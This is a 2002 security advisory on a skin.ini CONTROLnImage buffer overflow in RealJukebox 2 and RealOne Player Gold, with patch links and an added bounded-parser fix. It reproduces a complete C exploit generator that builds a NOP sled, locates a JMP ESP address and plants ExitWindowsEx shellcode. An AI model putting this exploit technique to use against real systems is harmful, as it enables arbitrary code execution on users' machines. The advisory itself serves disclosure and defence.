Real Networks RealJukebox/RealOne Player Gold Skin File Buffer Overflow Vulnerability

Published: 2002-07-15
Updated: 2002-07-15
Severity: High
Impact: privileges of the ordinary user running the player
Error type: boundary check error
Exploitation mode: server mode
BUGTRAQ ID: 5217

Affected systems
Real Networks RealJukebox 2 for Windows 1.0.2.379
(The vendor patches listed under "Solution" also cover RealJukebox 2 1.0.2.340, RealJukebox 2 Plus 1.0.2.340 and 1.0.2.379, and RealOne Player Gold 6.0.10.505.)

Detailed description
RealJukebox 2 and RealOne Player Gold contain a buffer overflow because fields in the skin file are not properly length-checked. A skin is a zip archive with the extension ".rjs" that contains a "skin.ini". If an attacker supplies an overlong file name in a "CONTROLnImage" entry of "skin.ini", the value overflows a fixed-size buffer when RealJukebox 2 or RealOne Player Gold processes the skin. Carefully constructed data can lead to arbitrary code execution with the privileges of the user who opened the skin.

Test code
If skin.ini contains the following fields:

[MAIN]
Application=RealJukebox
Version=2
SkinFamilyCount=5
CONTROL1Image=aaaaaaaaaa... (a long run of 'a')

save it as a zip file, rename it to '.rjs' and open it from IE; the application crashes.

The exploit below (by UNYUN, Shadow Penguin Security) generates such a skin.ini for Windows 2000 Professional SP2. It fills the CONTROL1Image value with a NOP sled, places a JMP ESP address found in kernel32.dll at the offset of the saved return address (28), places a readable address at offset 36 (presumably a pointer that is dereferenced before the function returns), and places a small payload at offset 60, where ESP points after the overwritten return. The payload calls ExitWindowsEx(EWX_FORCE, 4), forcing a logoff, and then spins; it serves only as proof that execution is controlled.

/*===========================================================
  RealJukebox2 1.0.2.379 Exploit for Windows
  Windows2000 Professional (Service Pack 2)
  The Shadow Penguin Security (http://www.shadowpenguin.org)
  Written by UNYUN (unyun@shadowpenguin.org)
============================================================ */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#define MAXBUF      4096
#define KERNEL_NAME "kernel32.dll"
#define SKIN_INI    "skin.ini"
#define INI_FILE \
    "[MAIN]\n"\
    "Application=RealJukebox\n"\
    "Version=2\n"\
    "SkinFamilyCount=5\n"\
    "\n"\
    "CONTROL1Image=%s\n"

#define NOP             0x90
#define FAKE_OFS1       36           /* offset of a pointer that must stay readable until the return */
#define FAKE_VAL1       0x7FFDF0F0   /* always-readable address in the Windows 2000 PEB region, no zero bytes */
#define RETADR_OFS      28           /* offset of the saved return address inside the overflowed buffer */
#define CODE_OFS        60           /* offset of the payload; ESP points here after the return */
#define RETADR_2000pro  0x77e0af64   /* fallback JMP ESP in kernel32.dll, Windows 2000 Pro SP2 */

/* Payload:  mov eax,<ExitWindowsEx> ; xor ebx,ebx ; mov bl,4 ; push ebx ; push ebx ;
 *           call eax ; nop ; jmp $-1
 * Bytes 1..4 (the imm32 of mov eax) are patched with the real address at run time. */
static unsigned char egg_2000pro[512]={
    0xB8,0xA5,0xFA,0xE1,0x77,0x33,0xDB,0xB3,
    0x04,0x53,0x53,0xFF,0xD0,0x90,0xEB,0xFD,
    0x00
};

/* Search [st,ed) for the byte pair c1 c2 (FF E4 = JMP ESP) and return its address,
 * skipping any address that contains a zero byte, since the value is written into a
 * C string and must survive the copy. */
unsigned int search_mem(unsigned char *st,unsigned char *ed,
                        unsigned char c1,unsigned char c2)
{
    unsigned char *p;
    unsigned int adr;

    for (p=st;p<ed;p++)
        if (*p==c1 && *(p+1)==c2){
            adr=(unsigned int)p;
            if ((adr&0xff)==0) continue;
            if (((adr>>8)&0xff)==0) continue;
            if (((adr>>16)&0xff)==0) continue;
            if (((adr>>24)&0xff)==0) continue;
            return(adr);
        }
    return(0);
}

/* Write val into buf as a little-endian 32-bit value. */
void valset(char *buf,unsigned int val)
{
    buf[0]=val&0xff;
    buf[1]=(val>>8)&0xff;
    buf[2]=(val>>16)&0xff;
    buf[3]=(val>>24)&0xff;
}

int main(int argc,char *argv[])
{
    FILE *fp;
    char buf[MAXBUF];
    unsigned int tgt,exw;
    unsigned char *kp;

    if ((fp=fopen(SKIN_INI,"wb"))==NULL){
        printf("Can not write file.\n");
        exit(1);
    }
    memset(buf,NOP,sizeof(buf));                  /* the whole field is a NOP sled */
    buf[sizeof(buf)-1]='\0';
    if ((kp=(unsigned char *)LoadLibrary(KERNEL_NAME))==NULL){
        printf("Can not find %s\n",KERNEL_NAME);
        exit(1);
    }
    tgt=search_mem(kp,kp+0x100000,0xff,0xe4);     /* find JMP ESP inside kernel32.dll */
    if (tgt==0) tgt=RETADR_2000pro;
    printf("kp = 0x%x\n",(unsigned int)kp);
    printf("JMP ESP addr = 0x%x\n",tgt);
    exw=(unsigned int)ExitWindowsEx;              /* user32.dll is at the same address in the target */
    printf("ExitWindowsEx = 0x%x\n",exw);
    valset(buf+FAKE_OFS1,FAKE_VAL1);
    valset(buf+RETADR_OFS,tgt);
    valset((char *)egg_2000pro+1,exw);            /* patch the mov eax,imm32 operand */
    strncpy(buf+CODE_OFS,(char *)egg_2000pro,strlen((char *)egg_2000pro));
    fprintf(fp,INI_FILE,buf);
    fclose(fp);
    printf("Created '%s'.\n",SKIN_INI);
    return(0);
}

Solution
Patch downloads:

Real Networks RealJukebox 2 for Windows 1.0.2.379:
  Real Networks patch skinpfree2.rmp
  http://www.service.real.com/help/faq/security/07092002/skinpfree2.rmp

Real Networks RealJukebox 2 Plus for Windows 1.0.2.379:
  Real Networks patch skinpplus2.rmp
  http://www.service.real.com/help/faq/security/07092002/skinpplus2.rmp

Real Networks RealJukebox 2 Plus for Windows 1.0.2.340:
  Real Networks patch skinpplus1.rmp
  http://www.service.real.com/help/faq/security/07092002/skinpplus1.rmp

Real Networks RealJukebox 2 for Windows 1.0.2.340:
  Real Networks patch skinpfree1.rmp
  http://www.service.real.com/help/faq/security/07092002/skinpfree1.rmp

Real Networks RealOne Player Gold for Windows 6.0.10.505:
  Real Networks patch skinpatchr11s.rmp
  http://www.service.real.com/help/faq/security/07092002/skinpatchr11s.rmp

Related information
Credit: UNYUN <unyun@shadowpenguin.org>
Reference: http://online.securityfocus.com/archive/1/281878
Vendor advisory: http://www.service.real.com/help/faq/security/bufferoverrun07092002.html
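The root cause described above is an unbounded copy of the CONTROLnImage value into a fixed buffer. The following is an added example, not Real Networks' code and not part of the original advisory or of UNYUN's exploit: a bounded parser for the skin.ini layout used in the test case, which rejects any CONTROLnImage value that would not fit, beside a generator that reproduces the advisory's overlong-field test file so the two can be run against each other. The 260-byte name limit (MAX_PATH-sized), the cap of 64 controls, and the sample image file names are assumptions, not the product's real limits or a real skin.

```c
/* Added example (not Real Networks code, not from the original advisory):
 * bounded parser for the [MAIN] layout of skin.ini next to a generator for
 * the advisory's overlong CONTROL1Image test case.
 * IMAGE_NAME_MAX and MAX_CONTROLS are assumed limits, not the product's. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define IMAGE_NAME_MAX 260   /* assumed limit for an image file name, including NUL */
#define MAX_CONTROLS   64    /* assumed cap on CONTROLnImage entries */

typedef struct {
    int  index;                   /* n from CONTROLnImage */
    char image[IMAGE_NAME_MAX];   /* NUL-terminated image file name */
} skin_control;

typedef struct {
    int          count;           /* accepted CONTROLnImage entries */
    int          rejected;        /* entries dropped for being too long or too many */
    skin_control ctl[MAX_CONTROLS];
} skin_main;

/* Match a key of the exact form CONTROL<digits>Image; return n, or -1 if it is not one. */
static int control_image_index(const char *key, size_t klen)
{
    size_t i = 7;
    int n = 0;
    if (klen < 13 || strncmp(key, "CONTROL", 7) != 0)
        return -1;
    while (i < klen && isdigit((unsigned char)key[i])) {
        n = n * 10 + (key[i] - '0');
        if (n > 9999)             /* refuse absurd indices instead of overflowing n */
            return -1;
        i++;
    }
    if (i == 7 || klen - i != 5 || strncmp(key + i, "Image", 5) != 0)
        return -1;
    return n;
}

/* Parse skin.ini text (LF or CRLF). The vulnerable code copied each CONTROLnImage
 * value into a fixed buffer without checking its length; here a value that does not
 * fit, or a surplus entry, is counted in 'rejected' and the call returns -1.
 * Returns 0 when every entry was accepted. */
int parse_skin_ini(const char *ini, skin_main *out)
{
    const char *p = ini;
    int rc = 0;

    memset(out, 0, sizeof(*out));
    while (*p) {
        const char *eol = strchr(p, '\n');
        size_t raw = eol ? (size_t)(eol - p) : strlen(p);
        size_t len = raw;
        const char *eq;

        if (len && p[len - 1] == '\r')          /* tolerate CRLF line endings */
            len--;
        /* section headers such as [MAIN] and blank lines carry no key=value */
        eq = (len && p[0] != '[') ? memchr(p, '=', len) : NULL;
        if (eq) {
            size_t klen = (size_t)(eq - p);
            size_t vlen = len - klen - 1;
            int n = control_image_index(p, klen);
            if (n >= 0) {
                if (vlen >= IMAGE_NAME_MAX || out->count >= MAX_CONTROLS) {
                    out->rejected++;            /* an unchecked copy would overflow here */
                    rc = -1;
                } else {
                    skin_control *c = &out->ctl[out->count++];
                    c->index = n;
                    memcpy(c->image, eq + 1, vlen);
                    c->image[vlen] = '\0';
                }
            }
        }
        p = eol ? eol + 1 : p + raw;
    }
    return rc;
}

/* Build the advisory's test case: the same [MAIN] fields with CONTROL1Image set to
 * image_len bytes of 'a'. Returns 0, or -1 if buf cannot hold the result. */
int build_long_image_ini(size_t image_len, char *buf, size_t buflen)
{
    static const char head[] =
        "[MAIN]\nApplication=RealJukebox\nVersion=2\nSkinFamilyCount=5\n\nCONTROL1Image=";
    size_t hlen = sizeof(head) - 1;

    if (buflen < hlen + image_len + 2)          /* room for newline and NUL */
        return -1;
    memcpy(buf, head, hlen);
    memset(buf + hlen, 'a', image_len);
    buf[hlen + image_len] = '\n';
    buf[hlen + image_len + 1] = '\0';
    return 0;
}

/* Constructed benign skin.ini in the layout of the advisory's test case (file names assumed). */
static const char GOOD_INI[] =
    "[MAIN]\r\n"
    "Application=RealJukebox\r\n"
    "Version=2\r\n"
    "SkinFamilyCount=5\r\n"
    "\r\n"
    "CONTROL1Image=main.bmp\r\n"
    "CONTROL2Image=play.bmp\r\n"
    "CONTROL10Image=volume.bmp\r\n";

int main(void)
{
    skin_main m;
    char bad[8192];
    int rc = parse_skin_ini(GOOD_INI, &m);
    printf("benign:   rc=%d accepted=%d rejected=%d\n", rc, m.count, m.rejected);
    if (build_long_image_ini(4096, bad, sizeof bad) == 0) {
        rc = parse_skin_ini(bad, &m);
        printf("overlong: rc=%d accepted=%d rejected=%d\n", rc, m.count, m.rejected);
    }
    return 0;
}
```

The benign file parses with three accepted entries; the generated file, which is the 4096-byte 'a' run from the test code, is rejected before any copy happens, which is the check the vendor patch has to add somewhere on the path from skin.ini to the image-name buffer.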